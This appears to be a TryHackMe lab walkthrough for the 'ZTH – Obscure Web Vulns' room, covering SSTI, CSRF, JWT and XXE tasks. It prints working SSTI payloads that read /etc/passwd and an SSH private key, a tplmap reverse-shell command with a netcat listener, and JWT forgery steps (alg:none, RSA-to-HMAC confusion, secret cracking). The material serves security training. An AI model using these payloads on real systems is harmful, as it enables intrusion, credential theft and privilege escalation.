This is the write up for the room ZTH – Obscure Web Vulns on Tryhackme and it is part of the Web Fundamentals Path
Make connection with VPN or use the attackbox on Tryhackme site to connect to the Tryhackme lab environment
The vulnerabilities that will be discussed are:
SSTI
CSRF
JWT
XXE
TASKS ZTH – Obscure Web Vulns
Task 1
Read all that is in this task and press compelte
Task 2
Read all that is in this task and press complete
Task 3
Read all that is in the task and press complete
Task 4
Rad all that is in the task.
4.1 How would a hacker(you 🙂 ) cat out /etc/passwd on the server(using cat with the rce payload)
Answer: {{config.class.init.globals['os'].popen(cat /etc/passwd ).read()}}4.2 What about reading in the contents of the user test’s private ssh key.(use the read file one not the rce one)
{{''.__class__.__mro__[2].__subclasses__()[40]()(/home/test/.ssh/id_rsa).read()}}Task 5
We need to install Tplmap first. I always install application from github into /opt directory
cd /opt git clone https://github.com/epinna/tplmap.git cd tplmap python2 -m pip install -r requirements.txt
The basic syntax for tplmap is different depending on whether you’re using get or post
| GET | tplmap -u <url>/?<vulnparam> |
| POST | tplmap -u <url> -d ‘<vulnparam>’ |
5.1 How would I cat out /etc/passwd using tplmap on the ip:port combo 10.10.10.10:5000, with the vulnerable param “noot”.
Answer: tplmap -u http://10.10.10.10:5000/ -d 'noot' --os-cmd 'cat /etc/passwd'
Task 6
Now spin up the attached machine. Let’s see if we can get a reverse shell first with tplmap and let the machine call us.
Open a terminal and start a listner with the following command
nc -nlvp 4444
Now we are going to use tplmap to let the server dail us. Type in the following command
./tplmap.py -u http://10.10.76.132 -d 'name' --reverse-shell <YOUR_IP> 4444
Why the name parameter. When going to the website and look in the source we see it is using the parameter name
We now have a reverse shell in the netcat terminal
Now improve the shell with the following command
python -c 'import pty; pty.spawn("/bin/bash")'Now go to the root and get that flag
Task 7
Terminate the machine from previous task. Read all that is in this task and press complete
Task 8
Read all that is in this task and press complete
Task 9
Install the tool suggested in the task by using the following command
pip3 install xsrfprobe
9.1 What parameter allows us to generate a POC(actual exploit)
Run the command
xsrfprobe
Looking at all the parameter we find the answer
Answer: --malicious
Task 10
Your challenge is to make a website vulnerable to CSRF, and exploit it. .
You can do this but you can also use DVWA or Juiceshop
Task 11
Read all that is in this task
I use base64 with Cyberchef. Try decrypting the message in this task
From Base64 – CyberChef (gchq.github.io)
Press complete
Task 12
This is hard to understand to read is carefully and press complete when done
Task 13
Read all that is in this task and press complete
Task 14
Spin up the machine attached to this task. I must say this task is not very good explained. But I see what we can do here
Navigate to http://MACHIEN_IP
Copy all after JWT and put it cyberchef.
We can;t read it. Now let’s get that key as stated in the task
You can download it here http://MACHINE_IP/public.pem
Download it
I’m going to use a tool for this. type in the following
cd /opt git clone https://github.com/Goron/TokenBreaker.git cd TokenBreak python3 -m pip install -r requirements.txt
Now for the command,
python3 RsaToHmac.py -t <THE TOKEN HERE> -p /root/Downloads/public.pem
Modify Header = N
Copy the Decode Payload value and put this in the Enter your payload Value
Copy the encoded Payload into the website
Task 15
Read all that is in the task and press complete
Task 16
Read all that is in the task and press complete
Task 17
There is no tool that can check the library, get the token, and make sure this is vulnerable. Therefore, you’re gonna have to do this manually. The header for each JWT none vuln though is the same, which can help you out. Here’s the header
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0Which decodes to {"type": "JWT", "alg": "none"}Press complete
Task 18
This one should be fun. Spin up the machine and navigate to the site. USe the login as seen in the below screenshot
In firefox now press F12. Navigate to Storage and select cookies
Copy the value of the token cookie
Now navigate to jwt.io and put in the code
Change user to admin and deselect secret
Copy the purple bit of the string to notepad and add the following in front of it
eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0
Now copy the whole string in the token. make sure it has a point at the end.\
now refresh the page
Task 19
Read all that is in this task and press complete
Task 20
Read all that is in this task and press complete
Task 21
Read all that is in this task and press complete
Task 22
Now for the fun part. Spin up the machine. start up burpsuite and navigate to http://<MACHINE_IP> with firefox. Once hte page is turn on intercept with burpsuite
If you do not know how to install burp then please follow this guide
Try creating an account and then open burpsuite and send the request to repeater
Change the payload
and send
22.1 How many users are on the system?
Answer 30
22.2 What is the name of the user with a UID of 1000?
Answer: para
Task 23
Read all that is in the task and press complete
Task 24
Read all that is in the task and press complete
Task 25
jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.it4Lj1WEPkrhRo9a2-XHMGtYburgHbdS5s7Iuc1YKOE" "abcdefghijklmnopqrstuwxyz" 6 Attempts: 100000 Attempts: 200000 Attempts: 300000 SECRET FOUND: pass Time taken (sec): 13.312 Attempts: 308791
